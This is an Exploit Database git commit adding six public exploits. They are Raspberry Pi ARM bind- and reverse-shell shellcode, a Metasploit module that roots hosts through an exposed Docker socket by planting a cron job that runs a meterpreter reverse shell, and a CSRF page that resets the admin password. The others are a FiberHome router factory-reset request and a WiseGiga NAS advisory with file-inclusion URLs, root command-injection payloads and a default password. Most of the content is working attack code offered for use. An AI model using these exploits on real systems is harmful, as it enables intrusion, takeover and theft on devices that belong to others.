DB: 2017-09-12

6 new exploits

Docker Daemon - Unprotected TCP Socket (Metasploit)
Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (192 bytes)
Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes)
Nimble Professional 1.0 - Cross-Site Request Forgery (Update Admin)
FiberHome ADSL AN1020-25 - Improper Access Restrictions
WiseGiga NAS - Multiple Vulnerabilities
This commit is contained in:
Offensive Security 2017-09-12 05:01:25 +00:00
parent 7744909119
commit 36667e62bc
7 changed files with 714 additions and 0 deletions

View file

@ -15797,6 +15797,7 @@ id,file,description,date,author,platform,type,port
42614,platforms/windows/remote/42614.txt,"Mongoose Web Server 6.5 - Cross-Site Request Forgery / Remote Code Execution",2017-09-04,hyp3rlinx,windows,remote,0
42627,platforms/linux/remote/42627.py,"Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution",2017-09-06,Warflop,linux,remote,0
42630,platforms/windows/remote/42630.rb,"Gh0st Client (C2 Server) - Buffer Overflow (Metasploit)",2017-09-07,Metasploit,windows,remote,80
42650,platforms/python/remote/42650.rb,"Docker Daemon - Unprotected TCP Socket (Metasploit)",2017-09-11,Metasploit,python,remote,2375
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -16443,6 +16444,8 @@ id,file,description,date,author,platform,type,port
42522,platforms/lin_x86-64/shellcode/42522.c,"Linux/x86_64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0
42523,platforms/lin_x86-64/shellcode/42523.c,"Linux/x86_64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",lin_x86-64,shellcode,0
42594,platforms/lin_x86/shellcode/42594.c,"Linux/x86 - Fork Bomb Shellcode (9 bytes)",2017-08-30,"Touhid M.Shaikh",lin_x86,shellcode,0
42646,platforms/arm/shellcode/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",arm,shellcode,0
42647,platforms/arm/shellcode/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",arm,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -38427,3 +38430,6 @@ id,file,description,date,author,platform,type,port
42643,platforms/php/webapps/42643.txt,"Law Firm 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
42644,platforms/php/webapps/42644.html,"Topsites Script 1.0 - Cross-Site Request Forgery / PHP Code Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
42645,platforms/php/webapps/42645.txt,"My Builder Marketplace 1.0 - SQL Injection",2017-09-09,"Ihsan Sencan",php,webapps,0
42648,platforms/php/webapps/42648.html,"Nimble Professional 1.0 - Cross-Site Request Forgery (Update Admin)",2017-09-11,"Ihsan Sencan",php,webapps,0
42649,platforms/hardware/webapps/42649.txt,"FiberHome ADSL AN1020-25 - Improper Access Restrictions",2017-09-05,"Ibad Shah",hardware,webapps,0
42651,platforms/hardware/webapps/42651.txt,"WiseGiga NAS - Multiple Vulnerabilities",2017-09-11,"Pierre Kim",hardware,webapps,0

Can't render this file because it is too large.

89
platforms/arm/shellcode/42646.c Executable file
View file

@ -0,0 +1,89 @@
/*
##################################
# Andrea Sindoni - @invictus1306 #
##################################
This schellcode is part of my episodes:
- ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/
Enviroment: Raspberry pi 3
Default settings for port:4444
@.syntax unified
.global _start
_start:
mov r1, #0x5C @ r1=0x5c
mov r5, #0x11 @ r5=0x11
mov r1, r1, lsl #24 @ r1=0x5c000000
add r1, r1, r5, lsl #16 @ r1=0x5c110000 - port number=4444(0x115C) --- Please change me
add r1, #2 @ r1=0x5c110002 - sin_family+sin_port
sub r2, r2, r2 @ sin_addr
push {r1, r2} @ push into the stack r1 and r2
mov r1, sp @ save pointer to sockaddr_in struct
mov r2, #0x10 @ addrlen
mov r0, r6 @ mov sockfd into r0
ldr r7, =#282 @ bind syscall
swi 0
@ listen for incoming connections via SYS_LISTEN
@ int listen(int sockfd, int backlog);
mov r0, r6 @ mov sockfd into r0
mov r1, #1 @ backlog=1
ldr r7, =#284 @ listen syscall
swi 0
@ Accept connections
@ int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen)
mov r0, r6 @ mov sockfd into r0
sub r1, r1, r1 @ addr=0
sub r2, r2, r2 @ addrlen=0
ldr r7, =#285 @ accept syscall
swi 0
@ Redirect stdin, stdout and stderr via dup2
mov r1, #2 @ counter stdin(0), stdout(1) and stderr(2)
loop:
mov r7, #63 @ dup2 syscall
swi 0
sub r1, r1, #1 @ decrement counter
cmp r1, #-1 @ compare r1 with -1
bne loop @ if the result is not equal jmp to loop
@ int execve(const char *filename, char *const argv[],char *const envp[]);
mov r0, pc
add r0, #32
sub r2, r2, r2
push {r0, r2}
mov r1, sp
mov r7, #11
swi 0
_exit:
mov r0, #0
mov r7, #1
swi 0 @ exit(0)
.asciz "/bin/sh"
Assemble and link it:
as -o bind.o bind.s
ld -o bind bind.o
*/
#include <stdio.h>
char *code="\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x00\x20\xa0\xe3\xa0\x70\x9f\xe5\x00\x00\x00\xef\x00\x60\xa0\xe1\x5c\x10\xa0\xe3\x11\x50\xa0\xe3\x01\x1c\xa0\xe1\x05\x18\x81\xe0\x02\x10\x81\xe2\x02\x20\x42\xe0\x06\x00\x2d\xe9\x0d\x10\xa0\xe1\x10\x20\xa0\xe3\x06\x00\xa0\xe1\x70\x70\x9f\xe5\x00\x00\x00\xef\x06\x00\xa0\xe1\x01\x10\xa0\xe3\x47\x7f\xa0\xe3\x00\x00\x00\xef\x06\x00\xa0\xe1\x01\x10\x41\xe0\x02\x20\x42\xe0\x50\x70\x9f\xe5\x00\x00\x00\xef\x02\x10\xa0\xe3\x3f\x70\xa0\xe3\x00\x00\x00\xef\x01\x10\x41\xe2\x01\x00\x71\xe3\xfa\xff\xff\x1a\x0f\x00\xa0\xe1\x20\x00\x80\xe2\x02\x20\x42\xe0\x05\x00\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0\xe3\x01\x70\xa0\xe3\x00\x00\x00\xef\x2f\x62\x69\x6e\x2f\x73\x68\x00\x19\x01\x00\x00\x1a\x01\x00\x00\x1d\x01\x00\x00";
int main(void) {
(*(void(*)()) code)();
return 0;
}

71
platforms/arm/shellcode/42647.c Executable file
View file

@ -0,0 +1,71 @@
/*
##################################
# Andrea Sindoni - @invictus1306 #
##################################
This schellcode is part of my episodes:
- ARM exploitation for IoT - https://quequero.org/2017/07/arm-exploitation-iot-episode-2/
Enviroment: Raspberry pi 3
Default settings for port:4444 ip:192.168.0.12
.global _start
_start:
mov r1, #0x5C @ r1=0x5c
mov r5, #0x11 @ r5=0x11
mov r1, r1, lsl #24 @ r1=0x5c000000
add r1, r1, r5, lsl #16 @ r1=0x5c110000 - port number=4444(0x115C) -- please change me
add r1, #2 @ r1=0x5c110002 - sin_family+sin_port
ldr r2, =#0x0c00a8c0 @ sin_addr=192.168.0.12 each octet is represented by one byte -- please change me
push {r1, r2} @ push into the stack r1 and r2
mov r1, sp @ save pointer to sockaddr_in struct
mov r2, #0x10 @ addrlen
mov r0, r6 @ mov sockfd into r0
ldr r7, =#283 @ connect syscall
swi 0
@ Redirect stdin, stdout and stderr via dup2
mov r1, #2 @ counter stdin(0), stdout(1) and stderr(2)
loop:
mov r0, r6 @ mov sockfd into r0
mov r7, #63 @ dup2 syscall
swi 0
sub r1, r1, #1 @ decrement counter
cmp r1, #-1 @ compare r1 with -1
bne loop @ if the result is not equal jmp to loop
@ int execve(const char *filename, char *const argv[],char *const envp[]);
mov r0, pc
add r0, #32
sub r2, r2, r2
push {r0, r2}
mov r1, sp
mov r7, #11
swi 0
_exit:
mov r0, #0
mov r7, #1
swi 0 @ exit(0)
shell: .asciz "/bin/sh"
Assemble and link it:
as -o reverse_shell.o reverse_shell.s
ld -o reverse_shell reverse_shell.o
*/
#include <stdio.h>
char *code= "\x02\x00\xa0\xe3\x01\x10\xa0\xe3\x00\x20\xa0\xe3\x80\x70\x9f\xe5\x00\x00\x00\xef\x00\x60\xa0\xe1\x5c\x10\xa0\xe3\x11\x50\xa0\xe3\x01\x1c\xa0\xe1\x05\x18\x81\xe0\x02\x10\x81\xe2\x64\x20\x9f\xe5\x06\x00\x2d\xe9\x0d\x10\xa0\xe1\x10\x20\xa0\xe3\x06\x00\xa0\xe1\x54\x70\x9f\xe5\x00\x00\x00\xef\x02\x10\xa0\xe3\x06\x00\xa0\xe1\x3f\x70\xa0\xe3\x00\x00\x00\xef\x01\x10\x41\xe2\x01\x00\x71\xe3\xf9\xff\xff\x1a\x0f\x00\xa0\xe1\x20\x00\x80\xe2\x02\x20\x42\xe0\x05\x00\x2d\xe9\x0d\x10\xa0\xe1\x0b\x70\xa0\xe3\x00\x00\x00\xef\x00\x00\xa0\xe3\x01\x70\xa0\xe3\x00\x00\x00\xef\x2f\x62\x69\x6e\x2f\x73\x68\x00\x19\x01\x00\x00\xc0\xa8\x00\x0c\x1b\x01\x00\x00";
int main(void) {
(*(void(*)()) code)();
return 0;
}

View file

@ -0,0 +1,135 @@
Title:
====
FiberHome Unauthenticated ADSL Router Factory Reset.
Credit:
======
Name: Ibad Shah
Twitter: @BeeFaauBee09
Website: beefaaubee09.github.io
CVE:
=====
CVE-2017-14147
Date:
====
05-09-2017 (dd/mm/yyyy)
About FiberHome:
======
FiberHome Technologies is a leading equipment vendor and global solution provider the field of information technology and telecommunications. FiberHome Deals in fiber-optic communications, data networking communications, wireless communication, and intelligentizing applications. In particular, it has been providing end-to-end solutions integrated with opto-electronic devices, opticpreforms, fiber & cables, and optical communication systems to many countries around the world.
Products & Services:
Wireless 3G/4G broadband devices
Custom engineered technologies
Broadband devices
URL : http://www.fiberhomegroup.com/
Description:
=======
This vulnerability in AN1020-25 router enables an anonymous unauthorized attacker to bypass authentication & access Resetting Router to Factory Settings, resulting in un-authorized operation & resetting it to Factory state. It later allows attacker to login to Router's Main Page with default username & password.
Affected Device Model:
=============
FiberHome ADSL AN1020-25
Exploitation-Technique:
===================
Remote
Details:
=======
Below listed vulnerability enables an anonymous unauthorized attacker to reset router to it's factory settings & further access router admin page with default credentials.
1) Bypass authentication and gain unauthorized access vulnerability - CVE-2017-14147
Vulnerable restoreinfo.cgi
Proof Of Concept:
================
PoC :
GET /restoreinfo.cgi HTTP/1.1
Host: 192.168.1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Connection: close
HTTP/1.1 200 Ok
Server: micro_httpd
Cache-Control: no-cache
Date: Sat, 01 Jan 2000 00:12:39 GMT
Content-Type: text/html
Connection: close
<html>
<head>
<meta HTTP-EQUIV='Pragma' CONTENT='no-cache'>
<link rel=stylesheet href='stylemain.css' type='text/css'>
<link rel=stylesheet href='colors.css' type='text/css'>
<script language="javascript">
<!-- hide
function restore() {
var enblPopWin = '0';
var loc = 'main.html';
var code = 'window.top.location="' + loc + '"';
if ( enblPopWin == '1' ) {
loc = 'index.html';
code = 'location="' + loc + '"';
}
eval(code);
}
function frmLoad() {
setTimeout("restore()", 60000);
}
// done hiding -->
</script>
</head>
<body onLoad='frmLoad()'>
<blockquote>
<b>DSL Router Restore</b><br><br>
The DSL Router configuration has been restored to default settings and the
router is rebooting.<br><br>
Close the DSL Router Configuration window and wait for 2 minutes before
reopening your web browser. If necessary, reconfigure your PC's IP address to
match your new configuration.
</blockquote>
</body>
</html>
Credits:
=======
Ibad Shah, Taimooor Zafar, Owais Mehtab

View file

@ -0,0 +1,171 @@
Source: https://blogs.securiteam.com/index.php/archives/3402
Vulnerabilities summary
The following advisory describes five (5) vulnerabilities and default accounts / passwords found in WiseGiga NAS devices.
WiseGiga is a Korean company selling NAS products.
The vulnerabilities found in WiseGiga NAS are:
Pre-Authentication Local File Inclusion (4 different vulnerabilities)
Post-Authentication Local File Inclusion
Remote Command Execution as root
Remote Command Execution as root with CSRF
Info Leak
Default accounts
Credit
An independent security researcher, Pierre Kim, has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
Vendor response
We tried to contact WiseGiga since June 2017, repeated attempts to establish contact went unanswered. At this time there is no solution or workaround for these vulnerabilities.
Vulnerabilities details
Pre-Authentication Local File Inclusion
User controlled input is not sufficiently sanitized and can be exploit by an attacker to get sensitive information (for example, passwords).
By sending GET request to the following URIs with filename= as a parameter, an attacker can trigger the vulnerabilities:
/webfolder/download_file1.php
down_data.php
download_file.php
mobile/download_file1.php
Proof of Concept
http://IP/webfolder/download_file1.php?filename=/etc/passwd
http://IP/down_data.php?filename=/etc/passwd
http://IP/download_file.php?filename=base64(/etc/passwd)
http://IP/mobile/download_file1.php?filename=base64(/etc/passwd)
Post-Authentication Local File Inclusion
User controlled input is not sufficiently sanitized and can be exploit by an attacker to get sensitive information (for example, passwords).
By sending GET request to /mobile/download_file2.php an attacker can trigger the vulnerability.
Proof of Concept
http://IP//mobile/download_file2.php?filename=base64(/etc/passwd)
Remote Command Execution as root
The WiseGiga NAS firmware contain pre.php files in the different directories.
For example:
/app_data/apache/htdocs/auto/pre.php
/app_data/apache/htdocs/admin/iframe/pre.php
/app_data/apache/htdocs/admin/pre.php
/app_data/apache/htdocs/mobile/pre.php
/app_data/apache/htdocs/wiseapp/config/pre.php
/app_data/apache/htdocs/pre.php
/home/htdocs/webfolder/pre.php
/ub/update/init/pre.php
/tmp/home/root/htdocs/auto/pre.php
/tmp/home/root/htdocs/pre.php
A “standard” pre.php contains:
181 [...]
182 function auth()
183 {
184 global $memberid;
185 session_start();
186 //echo $memberid;
187 if($memberid=="root")
188 {
189 // print<<<__DATA_OF_HTML__
190 //<script language="JavaScript">
191 // alert("sucess !");
192 //</script>
193 //__DATA_OF_HTML__;
194 }
195 else
196 {
197 print<<<__DATA_OF_HTML__
198 <script language="JavaScript">
199 alert("\xc0\xce\xc1\xf5\xb9\xde\xc1\xf6 \xbe\xca\xc0\xba \xbb\xe7\xbf\xeb\xc0\xda\xc0\xd4\xb4\xcf\xb4\xd9!");
200 // location.href='/admin/';
201 window.open('index.php','_parent');
202 exit;
203 </script>
204 __DATA_OF_HTML__;
205 }
206
207 }
Using global $memberid (line 184), the attacker can override the authentication, by specifying a valid user (“root”) inside the HTTP request:
GET /webpage[...]?memberid=root&[...] HTTP/1.0
The pre.php files also contains a function called root_exec_cmd() that is a wrapper to popen():
23 function root_exec_cmd($cmd)
24 {
25 $tmpfile=fopen("/tmp/ramdisk/cmd.list","w");
26 fwrite($tmpfile,$cmd);
27 fclose($tmpfile);
28 popen("/tmp/ramdisk/ramush","r");
29 }
By sending a GET request to root_exec_cmd() with user controlled $cmd variable input an attacker can execute arbitrary commands
The WiseGiga NAS runs the Apache server as root (uid=0 with gid=48 “apache”) hence the commands will execute as root.
Proof of Concept
By sending GET request to /admin/group.php with parameter ?cmd=add the WiseGiga NAS will call the add_system() function:
178 if($cmd == "add")
179 {
180 add_system();
181 }
The add_system() function uses global for $group_name and $user_data.
Then it will pass the user controlled input and will run it as root:
145 function add_system()
146 {
147 global $group_name,$user_data;
148
149 if(add_conf()==1)
150 {
151 //====================================================================================
152 root_exec_cmd("addgroup $group_name");
An attacker can get unauthenticated RCE as root by sending the following request:
http://IP/admin/group.php?memberid=root&cmd=add&group_name=d;id%20>%20/tmp/a
The file /tmp/a will contain:
uid=0(root) gid=48(apache) groups=48(apache)
Remote Command Execution as root with CSRF
There is no CSRF protection in WiseGiga NAS.
An attacker can force the execution of a command as root when the victim visits the malicious website.
Proof of Concept
Once the victim visit the attackers website with the following code, the attacker can execute arbitrary commands.
<img src="http://192.168.1.1/admin/group.php?memberid=root&cmd=add&group_name=d;COMMANDTOEXECUTE">
InfoLeak
accessing http://IP/webfolder/config/config.php will disclose the PHP configuration.
Default accounts
Username: guest
Password: guest09#$

View file

@ -0,0 +1,35 @@
<!--
# # # # #
# Exploit Title: Nimble Professional - Mobile Marketing Text Blast Web Application 1.0 - Cross-Site Request Forgery (Update Admin)
# Dork: N/A
# Date: 11.09.2017
# Vendor Homepage: http://ranksol.com/
# Software Link: http://www.mojomarketplace.com/item/nimble-pro
# Demo: http://demo.ranksol.com/demos/nimble-messaging-bulk-sms-marketing-application-for-business-pro-version/
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
#
# Proof of Concept:
-->
<html>
<body>
<label>Edit Profile:</label>
<form method="post" class="form-horizontal" action="http://localhost/[PATH]/ajax.php">
<label>Admin Name:</label>
<input type="text" name="name" style="width: 400px;" value="Admin">
<label>Admin Email:</label>
<input type="text" name="email" style="width: 400px;" value="a@a.com">
<label>Admin Password:</label>
<input type="text" name="pass" style="width: 400px;" value="efe">
<button type="submit" class="btn btn-success" >Save Profile</button>
<input type="hidden" name="cmd" value="save_profile">
</form>
</body>
</html>

207
platforms/python/remote/42650.rb Executable file
View file

@ -0,0 +1,207 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Docker Daemon - Unprotected TCP Socket Exploit',
'Description' => %q{
Utilizing Docker via unprotected tcp socket (2375/tcp, maybe 2376/tcp
with tls but without tls-auth), an attacker can create a Docker
container with the '/' path mounted with read/write permissions on the
host server that is running the Docker container. As the Docker
container executes command as uid 0 it is honored by the host operating
system allowing the attacker to edit/create files owned by root. This
exploit abuses this to creates a cron job in the '/etc/cron.d/' path of
the host server.
The Docker image should exist on the target system or be a valid image
from hub.docker.com.
},
'Author' => 'Martin Pizala', # started with dcos_marathon module from Erik Daguerre
'License' => MSF_LICENSE,
'References' => [
['URL', 'https://docs.docker.com/engine/security/security/#docker-daemon-attack-surface'],
['URL', 'https://docs.docker.com/engine/reference/commandline/dockerd/#bind-docker-to-another-hostport-or-a-unix-socket']
],
'DisclosureDate' => 'Jul 25, 2017',
'Targets' => [
[ 'Python', {
'Platform' => 'python',
'Arch' => ARCH_PYTHON,
'Payload' => {
'Compat' => {
'ConnectionType' => 'reverse noconn none tunnel'
}
}
}]
],
'DefaultOptions' => { 'WfsDelay' => 180, 'Payload' => 'python/meterpreter/reverse_tcp' },
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(2375),
OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]),
OptString.new('CONTAINER_ID', [ false, 'container id you would like'])
]
)
end
def check_image(image_id)
vprint_status("Check if images exist on the target host")
res = send_request_raw(
'method' => 'GET',
'uri' => normalize_uri('images', 'json')
)
return unless res and res.code == 200 and res.body.include? image_id
res
end
def pull_image(image_id)
print_status("Trying to pulling image from docker registry, this may take a while")
res = send_request_raw(
'method' => 'POST',
'uri' => normalize_uri('images', 'create?fromImage=' + image_id)
)
return unless res.code == 200
res
end
def make_container_id
return datastore['CONTAINER_ID'] unless datastore['CONTAINER_ID'].nil?
rand_text_alpha_lower(8)
end
def make_cmd(mnt_path, cron_path, payload_path)
vprint_status('Creating the docker container command')
echo_cron_path = mnt_path + cron_path
echo_payload_path = mnt_path + payload_path
cron_command = "python #{payload_path}"
payload_data = payload.raw
command = "echo \"#{payload_data}\" >> #{echo_payload_path} && "
command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path} && "
command << "echo \"\" >> #{echo_cron_path} && "
command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}"
command
end
def make_container(mnt_path, cron_path, payload_path)
vprint_status('Setting container json request variables')
{
'Image' => datastore['DOCKERIMAGE'],
'Cmd' => make_cmd(mnt_path, cron_path, payload_path),
'Entrypoint' => %w[/bin/sh -c],
'HostConfig' => {
'Binds' => [
'/:' + mnt_path
]
}
}
end
def del_container(container_id)
send_request_raw(
{
'method' => 'DELETE',
'uri' => normalize_uri('containers', container_id)
},
1 # timeout
)
end
def check
res = send_request_raw(
'method' => 'GET',
'uri' => normalize_uri('containers', 'json'),
'headers' => { 'Accept' => 'application/json' }
)
if res.nil?
print_error('Failed to connect to the target')
return Exploit::CheckCode::Unknown
end
if res and res.code == 200 and res.headers['Server'].include? 'Docker'
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def exploit
# check if target is vulnerable
unless check == Exploit::CheckCode::Vulnerable
fail_with(Failure::Unknown, 'Failed to connect to the target')
end
# check if image is not available, pull it or fail out
image_id = datastore['DOCKERIMAGE']
if check_image(image_id).nil?
fail_with(Failure::Unknown, 'Failed to pull the docker image') if pull_image(image_id).nil?
end
# create required information to create json container information.
cron_path = '/etc/cron.d/' + rand_text_alpha(8)
payload_path = '/tmp/' + rand_text_alpha(8)
mnt_path = '/mnt/' + rand_text_alpha(8)
container_id = make_container_id
# create container
res_create = send_request_raw(
'method' => 'POST',
'uri' => normalize_uri('containers', 'create?name=' + container_id),
'headers' => { 'Content-Type' => 'application/json' },
'data' => make_container(mnt_path, cron_path, payload_path).to_json
)
fail_with(Failure::Unknown, 'Failed to create the docker container') unless res_create && res_create.code == 201
print_status("The docker container is created, waiting for deploy")
register_files_for_cleanup(cron_path, payload_path)
# start container
send_request_raw(
{
'method' => 'POST',
'uri' => normalize_uri('containers', container_id, 'start')
},
1 # timeout
)
# wait until container stopped
vprint_status("Waiting until the docker container stopped")
res_wait = send_request_raw(
'method' => 'POST',
'uri' => normalize_uri('containers', container_id, 'wait'),
'headers' => { 'Accept' => 'application/json' }
)
# delete container
deleted_container = false
if res_wait.code == 200
vprint_status("The docker container has been stopped, now trying to remove it")
del_container(container_id)
deleted_container = true
end
# if container does not deploy, remove it and fail out
unless deleted_container
del_container(container_id)
fail_with(Failure::Unknown, "The docker container failed to deploy")
end
print_status('Waiting for the cron job to run, can take up to 60 seconds')
end
end